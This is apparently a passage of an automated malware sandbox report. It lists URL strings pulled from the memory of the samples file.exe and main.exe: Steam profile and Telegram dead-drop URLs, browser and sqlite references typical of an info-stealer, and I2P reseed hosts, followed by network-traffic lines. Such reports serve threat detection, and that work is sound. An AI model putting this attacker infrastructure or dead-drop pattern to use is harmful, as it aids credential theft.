Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://help.steampowered.com/en/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://i2p.ghativega.in/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: https://i2p.mooo.com/netDb/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://i2p.novg.net/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://lv.queniujq.cn
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://medal.tv
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://mozilla.org0/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: https://netdb.i2p2.no/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://player.vimeo.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed.diva.exchange/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr String found in binary or memory: https://reseed.i2p-projekt.de/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed.i2pgit.org/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed.memcpy.io/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed.onion.im/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://reseed2.i2p.net/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://s.ytimg.com;
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://sketchfab.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steam.tv/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcast.akamaized.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2762253914.00000000024F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/privac
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/armad2a
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://t.me/armad2ahellosqls.dllsqlite3.dllIn
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.digicert.com/CPS0
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/recaptcha/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr String found in binary or memory: https://www2.mk16.de/
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
